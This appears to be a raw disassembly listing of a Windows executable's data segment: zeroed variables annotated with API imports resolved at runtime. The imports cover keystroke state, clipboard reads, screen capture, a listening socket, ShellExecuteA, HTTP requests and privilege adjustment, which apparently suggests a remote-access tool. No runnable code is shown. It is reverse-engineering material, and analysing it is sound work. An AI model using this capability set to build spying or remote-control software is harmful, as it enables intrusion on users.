dword_43A48C dd 0 ; resolved to->IPHLPAPI.IcmpSendEcho ; sub_4088F8+116�r
dword_43A490 dd 0 ; sub_4061D5+BF3�r
dword_43A494 dd 0 ; resolved to->WS2_32.gethostbyaddr ; sub_4061D5+79E�r ...
dword_43A498 dd 0 ; resolved to->WS2_32.ntohs ; sub_4061D5+736�r ...
dword_43A49C dd 0 ; resolved to->ADVAPI32.IsValidSecurityDescriptor ; sub_4083DF+AB�r
dword_43A4A0 dd 0 dword_43A4A4 dd 0 ; sub_4061D5+9F0�r ...
dword_43A4A8 dd 0 ; sub_4061D5+C08�r
dword_43A4AC dd 0 ; resolved to->SHELL32.ShellExecuteA ; sub_4061D5+B75�r ...
dword_43A4B0 dd 0 ; resolved to->WS2_32.closesocket ; sub_402816+2DA�r ...
dword_43A4B4 dd 0 ; resolved to->GDI32.CreateDIBSection ; sub_4061D5+43B�w ...
dword_43A4B8 dd 0 ; resolved to->WS2_32.gethostname ; sub_4061D5+78E�r
dword_43A4BC dd 0 ; resolved to->WS2_32.WSACleanup ; sub_402C2F+48F�r ...
dword_43A4C0 dd 0 ; resolved to->ADVAPI32.LookupPrivilegeValueA ; sub_4061D5+323�r ...
dword_43A4C4 dd 0 ; resolved to->USER32.GetKeyState ; sub_405ED4+F9�r ...
dword_43A4C8 dd 0 ; resolved to->WS2_32.listen ; sub_4061D5+633�w ...
dword_43A4CC dd 0 ; resolved to->WS2_32.ntohl ; sub_402816+E3�r ...
dword_43A4D0 dd 0 ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_4061D5+2B9�r ...
dword_43A4D4 dd 0 ; resolved to->USER32.GetClipboardData ; sub_4061D5+1DA�r ...
dword_43A4D8 dd 0 ; sub_4061D5+B28�r ...
dword_43A4DC dd 0 ; resolved to->ADVAPI32.OpenProcessToken ; sub_4061D5+316�r ...
dword_43A4E0 dd 0 ; resolved to->ADVAPI32.OpenServiceA ; sub_4061D5+3A9�r ...
dword_43A4E4 dd 0 ; resolved to->GDI32.CreateDCA ; sub_4061D5+42E�w ...
dword_43A4E8 dd 0 ; sub_4061D5+8BD�w ...
dword_43A4EC dd 0 ; resolved to->WININET.HttpSendRequestA ; sub_4061D5+872�r ...
dword_43A4F0 dd 0 ; resolved to->WININET.InternetGetConnectedStateExA ; sub_4061D5+862�r ...
dword_43A4F4 dd 0 ; resolved to->WS2_32.ntohs ; sub_402816+83�r ...
dword_43A4F8 dd 0 ; sub_4061D5+12B�w ...
dword_43A4FC dd 0 ; sub_406E62+1C�r
dword_43A500 dd 0 ; sub_4061D5:loc_40642A�w ...
dword_43A504 dd 0 ; sub_406E62+50�r
dword_43A508 dd 0 ; sub_4061D5:loc_406504�w ...
dword_43A50C dd 0 ; sub_406E62+84�r
dword_43A510 dd 0 ; sub_406E62:loc_406F12�r
dword_43A514 dd 0 ; sub_406E62+B8�r
dword_43A518 dd 0 ; sub_406E62:loc_406F46�r
dword_43A51C dd 0 ; sub_406E62+EC�r
dword_43A520 dd 0 ; sub_4061D5+8D1�w ...
dword_43A524 dd 0 ; sub_406E62+120�r
dword_43A528 dd 0 ; sub_406E62:loc_406FAE�r ...
dword_43A52C dd 0 ; sub_406E62+154�r
dword_43A530 dd 0 ; sub_406E62:loc_406FE2�r ...
dword_43A534 dd 0 ; sub_406E62+188�r
dword_43A538 dd 0 ; sub_406E62:loc_407016�r
dword_43A53C dd 0 ; sub_406E62+1BC�r
dword_43A540 dd 0 ; sub_406E62:loc_40704A�r
dword_43A544 dd 0 ; sub_406E62+1F0�r
dword_43A548 dd 0 ; sub_406E62:loc_40707E�r
dword_43A54C dd 0 ; sub_406E62+224�r
dword_43A550 dd 0 ; sub_406E62:loc_4070B2�r
dword_43A554 dd 0 ; sub_406E62+258�r
dword_43A558 dd 0 ; sub_406E62:loc_4070E6�r
dword_43A55C dd 0 ; sub_406E62+28C�r
dword_43A560 dd 0 ; sub_406E62:loc_40711A�r
dword_43A564 dd 0 ; sub_406E62+2C0�r
dword_43A568 dd 80h dup(0) dword_43A768 dd 17h dup(0) ; sub_40786A+12D�o ...
dword_43A7C4 dd 0 ; sub_407B65+5B�r ...
dword_43A7C8 dd 0 ; sub_407B65+3E�w ...
align 10h
dword_43A7D0 dd 18h dup(0) ; sub_4080BD+12A�o
dword_43A830 dd 80h dup(0) ; sub_4081ED+A9�o
dword_43AA30 dd 80h dup(0) ; sub_4082A9+60�o
dword_43AC30 dd 80h dup(0) ; sub_408321+83�o ...
dword_43AE30 dd 80h dup(0) ; sub_4084FE+8E�o ...
dword_43B030 dd 4 dup(0) dword_43B040 dd 0 ; sub_402C2F+14E�o ...
dd 7Fh dup(0)
dword_43B240 dd 0 ; sub_41379F+3E�w ...
dword_43B244 dd 0 ; sub_401950:loc_401B41�r ...
dword_43B248 dd 0 ; sub_411963+A2�w ...
dword_43B24C dd 0 ; sub_405549+78�w ...
dword_43B250 dd 0 ; sub_41002B:loc_4100A8�r ...
dword_43B254 dd 0 ; sub_401141+25B�w ...
byte_43B258 db 0 ; DATA XREF: sub_4096A7+57�o
; sub_409806+26B2�r ...
align 4
dd 293Dh dup(0)
dword_445750 dd 0E9A0h dup(0)dword_47FDD0 dd 0 ; sub_4136B6+13�o ...
dword_47FDD4 dd 20h dup(0) dword_47FE54 dd 10h dup(0) dword_47FE94 dd 24h dup(0) dword_47FF24 dd 0 ; sub_40FAD0+4D7�w ...
dword_47FF28 dd 0 dd 3 dup(0)
dword_47FF38 dd 0 ; sub_401DBD+62�r ...
dd 5 dup(0)
dword_47FF50 dd 0 ; sub_409806+9D9�r
dd 1Fh dup(0)
dword_47FFD0 dd 0 ; sub_4138C5+19�o
dword_47FFD4 dd 2B9h dup(0) dword_480AB8 dd 0 ; sub_401DBD+47�o ...
byte_480ABC db 0 ; DATA XREF: sub_40942B+2A�r
; sub_40942B+33�o
align 10h
dword_480AC0 dd 0 ; sub_40FAD0:loc_40FF40�w ...
dword_480AC4 dd 0 ; sub_40FAD0+40A�w
dword_480AC8 dd 0 ; sub_4106AD+87�o
dword_480ACC dd 0 ; sub_410520+119�r ...
dword_480AD0 dd 0 ; sub_4106AD+115�w
dword_480AD4 dd 0 ; sub_410520+32�r ...
dword_480AD8 dd 0Dh dup(0) ; sub_410520+114�o ...
dword_480B0C dd 0 ; sub_410520+53�r ...
dd 0
dword_480B14 dd 0 align 10h
dword_480B20 dd 80h dup(0) byte_480D20 db 0 ; DATA XREF: sub_411F71:loc_411FCE�r
; sub_411F71+93�w
align 4
dword_480D24 dd 0Dh dup(0) dword_480D58 dd 101h dup(0) ; .text:00414EC8�o ...
dword_48115C dd 0 dword_481160 dd 0 dword_481164 dd 0 ; sub_419FC9�r ...
dword_481168 dd 0 ; .text:0041868D�w
dword_48116C dd 0 dword_481170 dd 0 ; sub_419FC9+9�r ...
dword_481174 dd 0 dword_481178 dd 0 ; sub_41DEA7+8F�w
dword_48117C dd 0 ; sub_40FAD0+314�r ...
dd 0
dword_481184 dd 0 ; sub_41DC74:loc_41DD25�r ...
dd 3 dup(0)
dword_481194 dd 0 dd 0
byte_48119C db 0 ; DATA XREF: sub_4182E0+35�w
; sub_41B07E+5�r
align 10h
dword_4811A0 dd 0 dword_4811A4 dd 0 ; sub_4182E0+C1�w
dword_4811A8 dd 0 ; sub_41DC74:loc_41DC86�r ...
align 10h
dword_4811B0 dd 0 align 10h
dword_4811C0 dd 54h dup(0) dword_481310 dd 0 dword_481314 dd 0 ; sub_416F93+147�r ...
dword_481318 dd 0 ; sub_41C534:loc_41C55D�w ...
dword_48131C dd 0 ; sub_41C139+31�w ...
dd 2 dup(0)
dword_481328 dd 0 ; sub_41D2FB+1D�w ...
dword_48132C dd 0 dword_481330 dd 41h dup(0) byte_481434 db 0 ; DATA XREF: sub_41DEA7:loc_41DEBE�w
align 4
dword_481438 dd 0 ; sub_41DF49+24�w ...
dword_48143C dd 0 ; sub_41E8E0+2E�w ...
dword_481440 dd 0 ; .text:off_432D6C�o ...
dword_481444 dd 0 dword_481448 dd 0 dd 0Bh dup(0)
dword_481478 dd 0 ; sub_41E8E0+14A�r ...
dd 3 dup(0)
dword_481488 dd 0 ; sub_41C139+272�r ...
dd 0Ah dup(0)
dword_4814B4 dd 0 ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCount ; sub_41EF60+39�w ...
dword_4814B8 dd 0 dword_4814BC dd 0 dword_4814C0 dd 0 ; sub_4204ED+182�r ...
dword_4814C4 dd 0 ; resolved to->USER32.MessageBoxA ; sub_42077B+38�w ...
dword_4814C8 dd 0 ; resolved to->USER32.GetActiveWindow ; sub_42077B:loc_420840�r
dword_4814CC dd 0 ; resolved to->USER32.GetLastActivePopup ; sub_42077B+D6�r
dword_4814D0 dd 0 ; resolved to->USER32.GetProcessWindowStation ; sub_42077B:loc_4207FB�r
dword_4814D4 dd 0 ; resolved to->USER32.GetUserObjectInformationA ; sub_42077B+9C�r
dd 30h dup(0)
dword_481598 dd 0 dword_48159C dd 0 ; sub_421383+87�r
dword_4815A0 dd 0 ; sub_421383+4D�r
dword_4815A4 dd 0 ; sub_421383+40�r
dword_4815A8 dd 0 ; sub_421383+5A�r
dd 4 dup(0)
dword_4815BC dd 0 ; sub_4219DA+31�w ...
dword_4815C0 dd 0 ; sub_421C8A+2E�w ...
dword_4815C4 dd 0 dword_4815C8 dd 0 dword_4815CC dd 0 dword_4815D0 dd 0 ; sub_41B3E4+F�r ...
align 10h
dword_4815E0 dd 0 ; sub_41AD23+5B�r ...
dword_4815E4 dd 3Fh dup(0) dword_4816E0 dd 0 ; sub_41CF64+87�r ...
dword_4816E4 dd 0 ; sub_41D0F6:loc_41D135�r ...
dword_4816E8 dd 0 ; sub_41D165+F5�w ...
dd 5 dup(0)
byte_481700 db 0 ; DATA XREF: sub_41CF3B+6�o
; sub_41D165+55�o ...
byte_481701 db 0 ; DATA XREF: sub_41802F+5E�r
; sub_41CF64+107�w ...
align 4
dd 40h dup(0)
dword_481804 dd 0 ; sub_41CF64+19�r ...
align 10h
word_481810 dw 0 ; DATA XREF: sub_41CF3B+1F�o
; sub_41D165+10C�o ...
align 10h
byte_481820 db 0 ; DATA XREF: sub_41CF64:loc_41D079�w
; sub_41CF64:loc_41D096�w ...
align 4
dd 3Fh dup(0)
dword_481920 dd 0 ; sub_41AEF7+51�r ...
dd 7 dup(0)
dword_481940 dd 400h dup(0) ; .text:00432640�o
dword_482940 dd 0 ; sub_41AFD5�r ...
dword_482944 dd 0 ; sub_41A20A+21C�r ...
dword_482948 dd 0 ; sub_41A1DF�r ...
dword_48294C dd 0 ; sub_41A1DF+8�r ...
dword_482950 dd 0 ; sub_416F93+6C�r ...
dword_482954 dd 0 ; sub_41A20A+300�w ...
dword_482958 dd 0 ; sub_41A522+5�r ...
dword_48295C dd 0 ; sub_41A20A+249�r ...
dword_482960 dd 0 ; sub_416D08+5D�r ...
dword_482964 dd 0 ; sub_416D08+F�r ...
dword_482968 dd 0 ; sub_41DC0B+F�r ...
dword_48296C dd 0 dword_482970 dd 0 ; sub_4182E0:loc_41833A�r ...
dword_482974 dd 0 ; sub_4182E0+62�r ...
dword_482978 dd 0 ; sub_41D44B+11�w ...
align 800h
_text ends
; Section 3. (virtual address 00084000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00084000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 484000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start